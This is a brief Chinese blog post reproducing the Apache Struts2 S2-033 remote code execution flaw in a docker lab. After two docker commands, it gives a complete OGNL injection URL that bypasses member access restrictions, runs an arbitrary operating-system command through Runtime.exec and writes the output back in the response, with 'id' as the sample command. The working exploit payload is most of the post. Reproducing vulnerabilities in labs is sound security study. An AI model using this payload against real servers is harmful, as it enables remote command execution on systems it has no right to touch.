漏洞复现:Struts2 远程代码执行漏洞(S2-033)

docker pull medicean/vulapps:s_struts2_s2-033

docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-033

EXP:

http://127.0.0.1:8080/orders/4/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=id

  


参考:http://vulapps.evalbug.com/s_struts2_s2-033/
posted @ 2018-01-04 19:10  菜就多练forever  阅读(1159)  评论(0编辑  收藏  举报